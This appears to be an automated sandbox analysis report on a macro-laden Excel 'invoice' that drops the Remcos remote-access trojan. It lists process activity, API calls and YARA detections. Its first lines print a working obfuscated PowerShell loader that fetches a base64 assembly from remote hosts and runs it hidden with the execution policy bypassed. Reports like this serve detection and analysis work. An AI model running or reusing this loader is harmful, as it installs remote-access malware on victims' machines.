                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,19_2_0041812A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,19_2_0041330D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,19_2_0041BBC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,19_2_0041BB9A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,20_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00401806 NtdllDefWindowProc_W,20_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004018C0 NtdllDefWindowProc_W,20_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004016FD NtdllDefWindowProc_A,21_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004017B7 NtdllDefWindowProc_A,21_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00402CAC NtdllDefWindowProc_A,22_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00402D66 NtdllDefWindowProc_A,22_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,19_2_004167EF
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 11_2_005848C211_2_005848C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043706A19_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041400519_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043E11C19_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004541D919_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004381E819_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041F18B19_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0044627019_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043E34B19_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004533AB19_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0042742E19_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043756619_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043E5A819_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004387F019_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043797E19_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004339D719_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0044DA4919_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00427AD719_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041DBF319_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00427C4019_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00437DB319_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00435EEB19_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0043DEED19_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00426E9F19_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_1001719419_2_10017194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_1000B5C119_2_1000B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044B04020_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043610D20_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044731020_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044A49020_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040755A20_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0043C56020_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044B61020_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044D6C020_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004476F020_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044B87020_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044081D20_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041495720_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004079EE20_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00407AEB20_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044AA8020_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00412AA920_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404B7420_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404B0320_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0044BBD820_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404BE520_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404C7620_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00415CFE20_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00416D7220_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00446D3020_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00446D8B20_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00406E8F20_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040503821_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041208C21_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004050A921_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040511A21_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043C13A21_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004051AB21_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044930021_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040D32221_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044A4F021_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043A5AB21_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041363121_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044669021_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044A73021_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004398D821_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004498E021_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0044A88621_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0043DA0921_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00438D5E21_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00449ED021_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041FE8321_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00430F5421_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004050C222_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004014AB22_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040513322_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004051A422_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040124622_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040CA4622_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040523522_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_004032C822_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_0040168922_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00402F6022_2_00402F60
                    Source: invoice_45009.xlsOLE indicator, VBA macros: true
                    Source: invoice_45009.xlsStream path 'MBD009D0189/\x1Ole' : https://m2g.me/d1a1_gZ"O4.\P=8VP '\9:0iX>&{w'S"M;8DlBcxnMK1UByC7gaUQOp2GbXSQcb0MOkJ7CVyoQWSNTNiAazXnb9XV3tDhJFSshoTwoFrIpm1q6Pn397ajoXGkyPFfr3McvMlJuv0LjsZEcvNv4cOgcodRfvlER49oQljy6C1dZ4Q9dMIqFYUaoaVvojV3zFaMmicE7VkNDWoub7zs2Du3vCZmZIquRHHaBCWqL87U43IJyEeAEHY5QqxWMSob~nOL_Pe5g~SR?
                    Source: ~WRF{93BF753C-FD01-4E16-B48B-F8FB75D6D297}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                    Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3120, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
